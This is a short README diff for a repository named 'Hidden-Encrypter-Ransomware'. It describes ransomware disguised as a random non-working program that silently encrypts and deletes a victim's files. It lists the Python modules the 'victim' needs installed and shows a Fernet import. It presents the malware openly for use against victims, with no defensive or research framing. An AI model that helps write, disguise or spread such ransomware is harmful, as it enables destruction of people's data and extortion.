NotRevokedYet/Hidden-Encrypter-Ransomware/README.txt

 # Hidden-Encrypter-Ransomware
 A ransomware that doesn't make any gui asking for money, it just looks like a random non-working program, little do they know, it encrypts and deletes the files.

-Make sure that the victm has at least one of these import pathlib import secrets import os import base64 import getpass import cryptography
+Make sure that the victm has at least one of these: import pathlib, import secrets, import os, import base64, import getpass, import cryptography

 from cryptography.fernet import Fernet